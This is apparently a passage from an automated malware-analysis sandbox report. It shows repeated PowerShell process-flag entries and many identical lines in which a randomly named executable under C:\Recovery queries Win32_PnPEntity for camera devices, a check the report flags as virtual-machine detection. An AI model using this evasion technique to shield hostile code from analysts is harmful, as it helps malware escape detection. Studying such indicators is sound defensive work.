Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
